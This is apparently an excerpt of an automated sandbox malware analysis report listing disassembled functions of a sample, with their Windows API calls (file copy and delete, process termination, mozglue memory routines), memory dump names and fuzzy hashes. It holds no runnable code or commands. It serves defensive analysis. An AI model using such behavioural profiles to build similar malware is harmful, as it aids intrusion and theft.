CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D2C1
lstrlen.KERNEL32(00000000), ref: 0018D4D8
lstrlen.KERNEL32(00000000), ref: 0018D4EC
DeleteFileA.KERNEL32(00000000), ref: 0018D56B

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 07c3d51f5fe79e83e3298d92acf310782a9fb415a92629529ac2f0c998c58191
Instruction ID: e16540cb6c90c32e8a773cca0553e541d9a64795588dc9072fbd3da10e3f5ba9
Opcode Fuzzy Hash: 07c3d51f5fe79e83e3298d92acf310782a9fb415a92629529ac2f0c998c58191
Instruction Fuzzy Hash: 1E919C729101089ACF05FBA4DC96DEE7338AF65304F908569F517660A1EF746B4CCBE2

Function 6C695C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C695D40
EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C695D67
__aulldiv.LIBCMT ref: 6C695DB4
LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C695DED

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: ef450bc33486c48436a0b2bcd86668b00c8d6d620e6ee6fc16cdf7471c273174
Instruction ID: 931ab2c822d611f44716c70d2a6836c0e209e105fa3fd3b4a35b5cbcc532b2fe
Opcode Fuzzy Hash: ef450bc33486c48436a0b2bcd86668b00c8d6d620e6ee6fc16cdf7471c273174
Instruction Fuzzy Hash: 25517171E041268FCF08CF69C894AAEBBF2FF85304F19461DD821A7750DB316945CB99

Function 6C67CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C67CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C67CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C67CF4E

Strings

0, xrefs: 6C67CF30

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 607c25052b4d1c7c634e32c2e7f96a4b65083280217957f742742b263af47f13
Instruction ID: 334c46d3cd2635d127a7dc825588b86cab3c83f62a185a41aab3df19961c7edb
Opcode Fuzzy Hash: 607c25052b4d1c7c634e32c2e7f96a4b65083280217957f742742b263af47f13
Instruction Fuzzy Hash: D8512371A042168FCB10CF18C490AAABBB5FF99300F19859DD85A5F351D331ED06CBE0

Function 00193070 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 3b8db521da47d5a22d8b0e2bcab0c1ce7a83fdfcca46f2a26e8b99d07e571b0f
Instruction ID: 2cedbedf71621322337e37351442f98d23bb2262c79aa8a2276797d37ee573e1
Opcode Fuzzy Hash: 3b8db521da47d5a22d8b0e2bcab0c1ce7a83fdfcca46f2a26e8b99d07e571b0f
Instruction Fuzzy Hash: B9416275D101099BCF08EFE4DC95AEEB778BF58304F448028E526772A0EB70AA49CF91

Function 6C6B6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6B82BC,?,?), ref: 6C6B649B

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B64A9

Part of subcall function 6C6AFA80: GetCurrentThreadId.KERNEL32 ref: 6C6AFA8D
Part of subcall function 6C6AFA80: AcquireSRWLockExclusive.KERNEL32(6C6FF448), ref: 6C6AFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B653F
free.MOZGLUE(?), ref: 6C6B655A

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 52a4e0c71e5ae920ff2dc2899b62758622e1cb61baea992e056c2df19afbddfb
Instruction ID: 7528e6f9b4f2574fd68515787ea5382a2c886459b1ffc55e2dc9249309892321
Opcode Fuzzy Hash: 52a4e0c71e5ae920ff2dc2899b62758622e1cb61baea992e056c2df19afbddfb
Instruction Fuzzy Hash: C73170B5A043059FD704CF14D884A9FBBE4FF89314F00442EE85A97741DB30E919CB96

Function 00198F70 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00198F8B

Part of subcall function 001987F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00198FBE,00000000), ref: 001987FB
Part of subcall function 001987F0: RtlAllocateHeap.NTDLL(00000000), ref: 00198802
Part of subcall function 001987F0: wsprintfW.USER32 ref: 00198818

OpenProcess.KERNEL32(00001001,00000000,?), ref: 0019904B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00199069
CloseHandle.KERNEL32(00000000), ref: 00199076

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 5487b02c265ea8c672d22d500aefe7283f61fa5200ae1845ab110086ddb8510c
Instruction ID: c4d5a847981634a96c523f92e7d931a92a0bf90bbfa63ae3260933955300d9f7
Opcode Fuzzy Hash: 5487b02c265ea8c672d22d500aefe7283f61fa5200ae1845ab110086ddb8510c
Instruction Fuzzy Hash: FD314971A00208AFDF14DBE4DD49BEDB7B8AB59300F244058F606AB194DBB4AA48CB51

Function 6C68B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C68B4F5
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C68B502
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C68B542
free.MOZGLUE(?), ref: 6C68B578

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 6e0f6bef24dc2f61200e8a3930d0bf8d745664f2b2fab1b4d47885a7b685e6e3
Instruction ID: d55229c5b2bbc01055727b3fa1eb0a56c1de7e1df98d6b283b10ed2c20b5d493
Opcode Fuzzy Hash: 6e0f6bef24dc2f61200e8a3930d0bf8d745664f2b2fab1b4d47885a7b685e6e3
Instruction Fuzzy Hash: 5A11D231A04B41C7D3118F2AD8407A5B3B2FFDB319F10570AD89953A02EBB1A5C5C7AE

Function 00197420 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DD0,00000000,?), ref: 00197450
RtlAllocateHeap.NTDLL(00000000), ref: 00197457
GetLocalTime.KERNEL32(?,?,?,?,?,001A0DD0,00000000,?), ref: 00197464
wsprintfA.USER32 ref: 00197493

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 9719ee201b48ee8a7dac11fd68c6754cef295e321cd4f5d84d185f82f38c757a
Instruction ID: c79bc07056b2b5a1e65f5ba245878e4ab54a145e130dda3b02fcf61ce75d9721
Opcode Fuzzy Hash: 9719ee201b48ee8a7dac11fd68c6754cef295e321cd4f5d84d185f82f38c757a
Instruction Fuzzy Hash: A611FAB2914118ABCB14DBD9DD45FBEB7BCFB4DB11F10411AF606A2680D7795940C7B0

Function 6C6B3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C67F20E,?), ref: 6C6B3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C67F20E,00000000,?), ref: 6C6B3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6B3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C6B3E0E

Part of subcall function 6C6ACC00: GetCurrentProcess.KERNEL32(?,?,6C6731A7), ref: 6C6ACC0D
Part of subcall function 6C6ACC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6731A7), ref: 6C6ACC16

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 094cc1598978bde7a2655d0ef85eb07bc4313b2b4bd87792bbbbbee648dce3d3
Instruction ID: 75a290f735dadd7c9327a839e024858a507899518fc83a019e54c306ad85e626
Opcode Fuzzy Hash: 094cc1598978bde7a2655d0ef85eb07bc4313b2b4bd87792bbbbbee648dce3d3
Instruction Fuzzy Hash: 59F012B16402087FD700AB55EC81DAB376DDB47624F050021FE1957741D636BE2686FF

Function 00198D80 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(001935FE,80000000,00000003,00000000,00000003,00000080,00000000,?,001935FE,?), ref: 00198D9C
GetFileSizeEx.KERNEL32(000000FF,001935FE), ref: 00198DB9
CloseHandle.KERNEL32(000000FF), ref: 00198DC7

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 3e76de8c8c57a8bb4daf9e66239c91bfa4e53ac39a9c3110da4c4fe67b135f7a
Instruction ID: fa78781b6eaa9c9c30b8a0a7c53f64ee54047285f3c1b42127f5086829ef1548
Opcode Fuzzy Hash: 3e76de8c8c57a8bb4daf9e66239c91bfa4e53ac39a9c3110da4c4fe67b135f7a
Instruction Fuzzy Hash: 38F0EC35E54208BBDB19DBF5DC49F9E77F9AB59711F108658F611A72C0EA70A6008B40

Function 0019C131 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0019C13D

Part of subcall function 0019B95F: __amsg_exit.LIBCMT ref: 0019B96F

__getptd.LIBCMT ref: 0019C154
__amsg_exit.LIBCMT ref: 0019C162
__updatetlocinfoEx_nolock.LIBCMT ref: 0019C186

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: c38dc0498bd6c2ec06834b8ce9d071ba81dfa7fcce4ad2c8f13386e9dcd78f77
Instruction ID: effea6b0cb37d062c80ceee003799d6de342b73ac66b65c34ece805ee7a15587
Opcode Fuzzy Hash: c38dc0498bd6c2ec06834b8ce9d071ba81dfa7fcce4ad2c8f13386e9dcd78f77
Instruction Fuzzy Hash: 36F0B432988310DBDF20BB78984375D37906F21724F954219F494A72E3CBA45840DBDA

Function 6C67BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C67BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C67BE8F

Strings

0, xrefs: 6C67BE5B

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
